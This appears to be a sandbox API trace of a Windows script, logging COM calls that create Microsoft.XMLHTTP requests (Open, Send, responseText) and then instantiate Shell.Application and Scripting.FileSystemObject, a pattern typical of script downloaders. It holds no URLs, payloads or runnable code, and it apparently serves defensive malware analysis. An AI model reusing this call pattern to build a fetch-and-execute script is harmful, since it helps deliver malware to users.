	[0509.955] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0509.955] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0509.955] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0509.956] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0509.956] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0509.956] ??2@YAPEAX_K@Z () returned 0x62f330
	[0509.956] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0509.956] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0509.956] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0509.956] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0509.956] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0509.956] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0509.956] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0509.956] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0509.956] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0509.957] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0509.957] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0514.117] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0514.117] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0514.117] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0514.117] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0514.117] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0514.117] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0514.118] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0514.118] SysStringLen (param_1=0x0) returned 0x0
	[0514.118] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0514.118] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0514.118] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0514.118] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0514.118] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0514.118] ??2@YAPEAX_K@Z () returned 0x62f350
	[0514.118] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0514.118] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0514.118] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0514.118] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0514.119] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0514.119] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0514.119] SysStringLen (param_1=0x0) returned 0x0
	[0514.119] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0514.122] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0514.122] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0514.122] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0514.122] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0514.122] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0514.122] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0515.461] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0515.461] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0515.462] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0515.463] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0515.463] SysStringLen (param_1=0x0) returned 0x0
	[0515.463] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0515.463] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0515.463] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0515.463] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0515.463] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0515.464] ??2@YAPEAX_K@Z () returned 0x62f330
	[0515.464] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0515.464] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0515.464] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0515.464] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0515.464] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0515.464] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0515.464] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0515.467] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0515.467] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0515.467] SysStringLen (param_1=0x0) returned 0x0
	[0515.467] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0515.467] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0515.467] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0515.467] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0515.467] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0515.467] ??2@YAPEAX_K@Z () returned 0x62f310
	[0515.467] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0515.467] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0515.468] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0515.468] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0515.468] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0515.468] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0515.468] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0515.468] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0515.468] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0515.468] SysStringLen (param_1=0x0) returned 0x0
	[0515.468] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0515.468] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0515.468] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0515.469] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0515.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7538) returned 0x0
	[0515.469] ??2@YAPEAX_K@Z () returned 0x62f330
	[0515.469] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7538, pUnkSite=0x62f330) 
	[0515.469] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0515.469] XMLHTTPRequest:IUnknown:Release (This=0x49c7538) returned 0x0
	[0515.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0515.469] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0515.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0515.469] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0515.469] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0515.469] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0515.470] SysStringLen (param_1=0x0) returned 0x0
